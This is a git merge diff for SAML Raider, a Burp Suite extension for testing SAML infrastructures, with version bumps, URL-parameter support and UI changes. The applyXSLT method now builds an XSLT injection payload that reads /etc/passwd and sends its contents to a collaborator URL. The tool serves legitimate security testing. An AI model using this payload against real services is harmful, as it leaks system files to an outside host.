Merge branch 'CompassSecurity-master'

Author: Hannah-PortSwigger

.gitignore

@@ -1,3 +1,4 @@
+.DS_Store
 .gradle
 .idea
 build

BappManifest.bmf

@@ -2,12 +2,12 @@ Uuid: c61cfa893bb14db4b01775554f7b802e
 ExtensionType: 1
 Name: SAML Raider
 RepoName: saml-raider
-ScreenVersion: 2.0.2
-SerialVersion: 17
+ScreenVersion: 2.1.0
+SerialVersion: 18
 MinPlatformVersion: 16
 ProOnly: False
 Author: Roland Bischofberger / Emanuel Duss / Tobias Hort-Giess
 ShortDescription: Provides a SAML message editor and a certificate management tool to help with testing SAML infrastructures.
-EntryPoint: build/libs/saml-raider-2.0.2.jar
+EntryPoint: build/libs/saml-raider-2.1.0.jar
 BuildCommand: ./gradlew jar
 SupportedProducts: Pro, Community

README.md

@@ -79,7 +79,7 @@ Don't forget to rate our extension with as many stars you like :smile:.
 ### Manual Installation
 
 First, download the latest SAML Raider version:
-[saml-raider-2.0.2.jar](https://github.com/SAMLRaider/SAMLRaider/releases/download/v2.0.2/saml-raider-2.0.2.jar).
+[saml-raider-2.1.0.jar](https://github.com/SAMLRaider/SAMLRaider/releases/download/v2.1.0/saml-raider-2.1.0.jar).
 Then, start Burp Suite and click in the `Extensions` tab on `Add`. Choose the
 SAML Raider JAR file to install it and you are ready to go.
 

build.gradle

@@ -2,7 +2,7 @@ plugins {
 	id "java-library"
 }
 
-version = "2.0.2"
+version = "2.1.0"
 
 repositories {
 	mavenCentral()
@@ -14,6 +14,7 @@ compileJava {
 }
 
 dependencies {
+	compileOnly libs.com.formdev.flatlaf
 	compileOnly libs.net.portswigger.burp.extensions.montoya.api
 	compileOnly libs.org.bouncycastle.bcpkix.jdk15on
 

gradle/libs.versions.toml

@@ -1,4 +1,5 @@
 [versions]
+com-formdev-flatlaf = "3.5.2"
 com-google-guava = "33.2.1-jre"
 com-miglayout = "3.7.4"
 com-sun-xml-security-xml-security-impl = "1.0"
@@ -9,6 +10,7 @@ org-junit-jupiter = "5.10.2"
 xerces-xercesimpl = "2.12.2"
 
 [libraries]
+com-formdev-flatlaf = { module = "com.formdev:flatlaf", version.ref = "com-formdev-flatlaf"}
 com-google-guava = { module = "com.google.guava:guava", version.ref = "com-google-guava"}
 com-miglayout =  { module = "com.miglayout:miglayout", version.ref = "com-miglayout" }
 com-sun-xml-security-xml-security-impl = { module = "com.sun.xml.security:xml-security-impl", version.ref = "com-sun-xml-security-xml-security-impl" }

src/main/java/application/SamlMessageAnalyzer.java

@@ -17,7 +17,8 @@ public record SamlMessageAnalysisResult(
             boolean isWSSMessage,
             boolean isSAMLRequest,
             boolean isInflated,
-            boolean isGZip) {
+            boolean isGZip,
+            boolean isURLParam) {
     }
 
     public static SamlMessageAnalysisResult analyze(
@@ -32,6 +33,7 @@ public static SamlMessageAnalysisResult analyze(
         var isSAMLRequest = false;
         var isInflated = false;
         var isGZip = false;
+        var isURLParam = false;
 
         var xmlHelpers = new XMLHelpers();
         if (request.contentType() == ContentType.XML) {
@@ -59,16 +61,19 @@ else if (request.hasParameter("wresult", HttpParameterType.BODY)) {
                 BurpExtender.api.logging().logToError(e);
             }
         } else {
-            String requestParameter;
-            requestParameter = request.parameterValue(samlResponseParameterName, HttpParameterType.BODY);
-            if (requestParameter != null) {
-                isSAMLMessage = true;
-            }
-            requestParameter = request.parameterValue(samlRequestParameterName, HttpParameterType.BODY);
-            if (requestParameter != null) {
-                isSAMLRequest = true;
-                isSAMLMessage = true;
-            }
+            var samlResponseInBody = request.parameterValue(samlResponseParameterName, HttpParameterType.BODY);
+            var samlResponseInUrl = request.parameterValue(samlResponseParameterName, HttpParameterType.URL);
+            var samlRequestInBody = request.parameterValue(samlRequestParameterName, HttpParameterType.BODY);
+            var samlRequestInUrl = request.parameterValue(samlRequestParameterName, HttpParameterType.URL);
+
+            isSAMLMessage =
+                    samlResponseInBody != null
+                            || samlResponseInUrl != null
+                            || samlRequestInBody != null
+                            || samlRequestInUrl != null;
+
+            isSAMLRequest = samlRequestInBody != null || samlRequestInUrl != null;
+            isURLParam = samlResponseInUrl != null || samlRequestInUrl != null;
         }
 
         return new SamlMessageAnalysisResult(
@@ -78,7 +83,8 @@ else if (request.hasParameter("wresult", HttpParameterType.BODY)) {
                 isWSSMessage,
                 isSAMLRequest,
                 isInflated,
-                isGZip);
+                isGZip,
+                isURLParam);
     }
 
     private SamlMessageAnalyzer() {

src/main/java/application/SamlTabController.java

@@ -40,29 +40,25 @@
 import javax.xml.crypto.dsig.XMLSignatureException;
 import javax.xml.parsers.ParserConfigurationException;
 import model.BurpCertificate;
-import org.w3c.dom.DOMException;
-import org.w3c.dom.Document;
-import org.w3c.dom.Element;
-import org.w3c.dom.Node;
-import org.w3c.dom.NodeList;
+import org.w3c.dom.*;
 import org.xml.sax.SAXException;
 
 import static java.util.Objects.requireNonNull;
 
 public class SamlTabController implements ExtensionProvidedHttpRequestEditor, Observer {
 
-    private static final String XML_CERTIFICATE_NOT_FOUND = "X509 Certificate not found";
-    private static final String XSW_ATTACK_APPLIED = "XSW Attack applied";
-    private static final String XXE_CONTENT_APPLIED = "XXE content applied";
-    private static final String XML_NOT_SUITABLE_FOR_XXE = "This XML Message is not suitable for this particular XXE attack";
-    private static final String XSLT_CONTENT_APPLIED = "XSLT content applied";
-    private static final String XML_NOT_SUITABLE_FOR_XLST = "This XML Message is not suitable for this particular XLST attack";
-    private static final String XML_COULD_NOT_SIGN = "Could not sign XML";
-    private static final String XML_COULD_NOT_SERIALIZE = "Could not serialize XML";
-    private static final String XML_NOT_WELL_FORMED = "XML isn't well formed or binding is not supported";
-    private static final String XML_NOT_SUITABLE_FOR_XSW = "This XML Message is not suitable for this particular XSW, is there a signature?";
-    private static final String NO_BROWSER = "Could not open diff in Browser. Path to file was copied to clipboard";
-    private static final String NO_DIFF_TEMP_FILE = "Could not create diff temp file.";
+    public static final String XML_CERTIFICATE_NOT_FOUND = "X509 Certificate not found";
+    public static final String XSW_ATTACK_APPLIED = "XSW Attack applied";
+    public static final String XXE_CONTENT_APPLIED = "XXE content applied";
+    public static final String XML_NOT_SUITABLE_FOR_XXE = "This XML Message is not suitable for this particular XXE attack";
+    public static final String XSLT_CONTENT_APPLIED = "XSLT content applied";
+    public static final String XML_NOT_SUITABLE_FOR_XSLT = "This XML Message is not suitable for this particular XSLT attack";
+    public static final String XML_COULD_NOT_SIGN = "Could not sign XML";
+    public static final String XML_COULD_NOT_SERIALIZE = "Could not serialize XML";
+    public static final String XML_NOT_WELL_FORMED = "XML isn't well formed or binding is not supported";
+    public static final String XML_NOT_SUITABLE_FOR_XSW = "This XML Message is not suitable for this particular XSW, is there a signature?";
+    public static final String NO_BROWSER = "Could not open diff in Browser. Path to file was copied to clipboard";
+    public static final String NO_DIFF_TEMP_FILE = "Could not create diff temp file.";
 
     private final CertificateTabController certificateTabController;
     private XMLHelpers xmlHelpers;
@@ -238,22 +234,24 @@ public void setRequestResponse(HttpRequestResponse requestResponse) {
                                     this.samlMessageAnalysisResult.isWSSUrlEncoded());
                     this.samlMessage = decodedSAMLMessage.message();
                 } else {
-                    String parameterValue;
+                    var httpParamType =
+                            this.samlMessageAnalysisResult.isURLParam()
+                                    ? HttpParameterType.URL
+                                    : HttpParameterType.BODY;
 
-                    if (this.samlMessageAnalysisResult.isSAMLRequest()) {
-                        parameterValue = requestResponse.request().parameterValue(certificateTabController.getSamlRequestParameterName(), HttpParameterType.BODY);
-                    } else {
-                        parameterValue = requestResponse.request().parameterValue(certificateTabController.getSamlResponseParameterName(), HttpParameterType.BODY);
-                    }
+                    var parameterValue =
+                            this.samlMessageAnalysisResult.isSAMLRequest()
+                                    ? requestResponse.request().parameterValue(certificateTabController.getSamlRequestParameterName(), httpParamType)
+                                    : requestResponse.request().parameterValue(certificateTabController.getSamlResponseParameterName(), httpParamType);
 
                     var decodedSAMLMessage =
                             SamlMessageDecoder.getDecodedSAMLMessage(
                                     parameterValue,
                                     this.samlMessageAnalysisResult.isWSSMessage(),
                                     this.samlMessageAnalysisResult.isWSSUrlEncoded());
+
                     this.samlMessage = decodedSAMLMessage.message();
                 }
-
             } catch (IOException e) {
                 BurpExtender.api.logging().logToError(e);
                 setInfoMessageText(XML_COULD_NOT_SERIALIZE);
@@ -339,9 +337,7 @@ public void removeSignature() {
     }
 
     public void resetMessage() {
-        if (isRawMode) {
-            samlMessage = orgSAMLMessage;
-        }
+        samlMessage = orgSAMLMessage;
         textArea.setContents(ByteArray.byteArray(samlMessage));
         isEdited = false;
     }
@@ -430,11 +426,15 @@ public void resignMessage() {
     }
 
     private void setInfoMessageText(String infoMessage) {
-        samlGUI.getActionPanel().getInfoMessageLabel().setText(infoMessage);
+        samlGUI.getActionPanel().getStatusMessageLabel().setText(infoMessage);
+    }
+
+    public String getInfoMessageText() {
+        return samlGUI.getActionPanel().getStatusMessageLabel().getText();
     }
 
     private void resetInfoMessageText() {
-        samlGUI.getActionPanel().getInfoMessageLabel().setText("");
+        samlGUI.getActionPanel().getStatusMessageLabel().setText("");
     }
 
     private void updateCertificateList() {
@@ -534,33 +534,45 @@ public void applyXXE(String collabUrl) {
     }
 
     public void applyXSLT(String collabUrl) {
-        String xslt = "\n" +
-                "<ds:Transform>\n" +
-                "  <xsl:stylesheet xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">\n" +
-                "    <xsl:template match=\"doc\">\n" +
-                "      <xsl:variable name=\"file\" select=\"'test'\"/>\n" +
-                "      <xsl:variable name=\"escaped\" select=\"encode-for-uri('$file')\"/>\n" +
-                "      <xsl:variable name=\"attackURL\" select=\"'" + collabUrl + "'\"/>\n" +
-                "      <xsl:variable name=\"exploitURL\" select=\"concat($attackerURL,$escaped)\"/>\n" +
-                "      <xsl:value-of select=\"unparsed-text($exploitURL)\"/>\n" +
-                "    </xsl:template>\n" +
-                "  </xsl:stylesheet>\n" +
-                "</ds:Transform>";
-        String transformString = "<ds:Transforms>";
+        var prefixed = true;
+        var transformString = "<ds:Transforms>";
+
         int index = orgSAMLMessage.indexOf(transformString);
+        if (index == -1) {
+            prefixed = false;
+            transformString = "<Transforms>";
+        }
 
+        index = orgSAMLMessage.indexOf(transformString);
         if (index == -1) {
-            setInfoMessageText(XML_NOT_SUITABLE_FOR_XLST);
-        } else {
-            int substringIndex = index + transformString.length();
-            String firstPart = orgSAMLMessage.substring(0, substringIndex);
-            String secondPart = orgSAMLMessage.substring(substringIndex);
-            samlMessage = firstPart + xslt + secondPart;
-            textArea.setContents(ByteArray.byteArray(samlMessage));
-            isEdited = true;
-            setRawMode(true);
-            setInfoMessageText(XSLT_CONTENT_APPLIED);
+            setInfoMessageText(XML_NOT_SUITABLE_FOR_XSLT);
+            return;
         }
+
+        var prefix = prefixed ? "ds:" : "";
+        var xslt = """
+                
+                <%sTransform>
+                  <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+                    <xsl:template match="doc">
+                      <xsl:variable name="file" select="unparsed-text('/etc/passwd')"/>
+                      <xsl:variable name="escaped" select="encode-for-uri($file)"/>
+                      <xsl:variable name="attackerUrl" select="'%s'"/>
+                      <xsl:variable name="exploitUrl" select="concat($attackerUrl,$escaped)"/>
+                      <xsl:value-of select="unparsed-text($exploitUrl)"/>
+                    </xsl:template>
+                  </xsl:stylesheet>
+                </%sTransform>
+                """.formatted(prefix, collabUrl, prefix);
+
+        int substringIndex = index + transformString.length();
+        String firstPart = orgSAMLMessage.substring(0, substringIndex);
+        String secondPart = orgSAMLMessage.substring(substringIndex);
+        samlMessage = firstPart + xslt + secondPart;
+        textArea.setContents(ByteArray.byteArray(samlMessage));
+        isEdited = true;
+        setRawMode(true);
+        setInfoMessageText(XSLT_CONTENT_APPLIED);
     }
 
     public synchronized void addMatchAndReplace(String match, String replace) {
@@ -580,12 +592,14 @@ public void setGUIEditable(boolean editable) {
     }
 
     public void showSignatureHelp() {
-        SignatureHelpWindow window = new SignatureHelpWindow();
+        var window = new SignatureHelpWindow();
+        window.setLocationRelativeTo(BurpExtender.api.userInterface().swingUtils().suiteFrame());
         window.setVisible(true);
     }
 
     public void showXSWHelp() {
         XSWHelpWindow window = new XSWHelpWindow();
+        window.setLocationRelativeTo(BurpExtender.api.userInterface().swingUtils().suiteFrame());
         window.setVisible(true);
     }
 

src/main/java/gui/CertificateTab.java

@@ -1,6 +1,7 @@
 package gui;
 
 import application.CertificateTabController;
+import com.formdev.flatlaf.ui.FlatTreeUI;
 import model.BurpCertificate;
 import model.BurpCertificateBuilder;
 import model.ObjectIdentifier;
@@ -146,6 +147,7 @@ public void actionPerformed(ActionEvent e) {
 
         certificateTreeModel = new DefaultTreeModel(new DefaultMutableTreeNode("root"));
         certificateTree = new JTree(certificateTreeModel);
+        certificateTree.setUI(new FlatTreeUI());
         certificateTree.setRootVisible(false);
         certificateTree.setShowsRootHandles(true);
         certificateTree.setCellRenderer((tree, value, selected, expanded, leaf, row, hasFocus) -> {